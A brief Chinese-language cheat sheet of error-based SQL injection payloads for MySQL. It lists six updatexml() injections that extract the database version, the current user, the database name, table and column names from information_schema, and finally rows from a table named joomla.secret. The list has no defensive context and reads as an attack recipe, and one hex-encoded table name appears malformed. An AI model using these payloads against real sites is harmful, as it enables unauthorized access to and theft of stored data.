1.爆数据库版本信息
1 | updatexml(1,concat(0x7e,(SELECT @@version),0x7e),1) |
2.链接用户
1 | updatexml(1,concat(0x7e,(SELECT user()),0x7e),1) |
3.链接数据库
1 | updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) |
4.暴露数据表名称
1 | updatexml(2,concat(0x3a,(SELECT(HEX(TABLE_NAME))FROM(information_schema.tables) LIMIT 0,1),0x3a),1) |
5.暴露数据表的列名称
1 | updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name=66333261685F6D656E755F747970657 limit 0,1)),0) |
6.查数据
1 | updatexml(1,concat(0x3e,(select concat(id) from joomla.secret limit 0,1)),0) |